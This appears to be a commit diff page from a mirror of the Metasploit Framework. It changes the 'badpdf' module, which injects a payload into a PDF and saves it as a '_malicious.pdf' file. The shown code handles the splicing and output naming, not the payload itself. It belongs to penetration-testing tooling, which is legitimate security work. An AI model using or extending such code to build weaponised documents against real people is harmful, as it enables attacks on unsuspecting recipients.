infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Minor Code Improvement

GSoC/Meterpreter_Web_Console
rmdavy 2018-06-07 21:06:47 +01:00 committed by GitHub
parent 992d2130aa
commit ab80eadc3f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 9 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

14
modules/auxiliary/fileformat/badpdf.rb
View File

@ -17,8 +17,8 @@ class MetasploitModule < Msf::Auxiliary
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => 'Author' =>
[ [
'Richard Davy - secureyourit.co.uk', 'Richard Davy - secureyourit.co.uk', #Module written by Richard Davy
'CheckPoint researchers - Assaf Baharav, Yaron Fruchtmann, Ido Solomon' 'CheckPoint researchers - Assaf Baharav, Yaron Fruchtmann, Ido Solomon' #Code provided as POC by CheckPoint Researchers
], ],
'Platform' => [ 'win' ], 'Platform' => [ 'win' ],
'References' => 'References' =>
@ -61,17 +61,21 @@ class MetasploitModule < Msf::Auxiliary
if content.index("/Contents 4 0 R") != nil if content.index("/Contents 4 0 R") != nil
#If place holder exists create new file content #If place holder exists create new file content
newdata = content[0..(content.index('/Contents 4 0 R')+14)]+inject_payload+content[(content.index('/Contents 4 0 R')+15)..-1] newdata = content[0..(content.index('/Contents 4 0 R')+14)]+inject_payload+content[(content.index('/Contents 4 0 R')+15)..-1]
elsif content.index("/Contents 6 0 R") != nil
#If place holder exists create new file content
newdata = content[0..(content.index('/Contents 6 0 R')+14)]+inject_payload+content[(content.index('/Contents 6 0 R')+15)..-1]
elsif content.index("/Contents 8 0 R") != nil elsif content.index("/Contents 8 0 R") != nil
#If place holder exists create new file content #If place holder exists create new file content
newdata = content[0..(content.index('/Contents 8 0 R')+14)]+inject_payload+content[(content.index('/Contents 8 0 R')+15)..-1] newdata = content[0..(content.index('/Contents 8 0 R')+14)]+inject_payload+content[(content.index('/Contents 8 0 R')+15)..-1]
end end
if newdata != nil if newdata != nil
newfilename = datastore['PDFINJECT'][(0..(datastore['PDFINJECT'].length-5))]+"_malicious.pdf"
#Write content to file #Write content to file
File.open(datastore['PDFINJECT']+".malicious", 'wb') { |file| file.write(newdata) } File.open(newfilename, 'wb') { |file| file.write(newdata) }
#Check file exists and display path or error message #Check file exists and display path or error message
if File.exists?(datastore['PDFINJECT']+".malicious") if File.exists?(newfilename)
print_good("Malicious file writen to #{datastore['PDFINJECT']}"+".malicious") print_good("Malicious file writen to "+newfilename)
else else
print_error "Something went wrong creating malicious PDF file" print_error "Something went wrong creating malicious PDF file"
end end